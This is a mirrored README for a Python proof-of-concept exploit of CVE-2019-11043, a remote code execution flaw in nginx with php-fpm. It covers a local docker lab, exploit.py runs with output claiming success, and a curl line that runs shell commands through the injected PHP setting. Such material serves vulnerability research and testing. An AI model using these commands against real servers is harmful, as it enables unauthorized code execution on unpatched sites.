CVE 2019 11043 Save

(PoC) Python version of CVE-2019-11043 exploit by neex

Project README

PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit https://github.com/neex/phuip-fpizdam
This PoC is still a draft, please use the exploit written by @neex
Vulnerability Analysis: https://paper.seebug.org/1064/

PoC Setup

Just run docker compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

if you wish to read php-fpm logs, you could run:

docker logs --tail 10 --follow php

Exploit

# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

If you want to check the vulnerability only, skipping the exploit:

python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

You can try to kill php-fpm process and reset all injected PHP settings with --reset:

python3 exploit.py --url http://localhost/index.php --reset

Video PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

Open Source Agenda is not affiliated with "CVE 2019 11043" Project. README Source: theMiddleBlue/CVE-2019-11043
Stars
144
Open Issues
1
Last Commit
4 years ago
Repository
theMiddleBlue/CVE-2019-11043

Open Source Agenda Badge

Open Source Agenda Rating
Submit Review Review Your Favorite Project
Submit Resource Articles, Courses, Videos
Submit Article Submit a post to our blog

From the blog

Dec 11, 2022

How to Choose Which Programming Language to Learn First?

From the blog

Dec 11, 2022

How to Choose Which Programming Language to Learn First?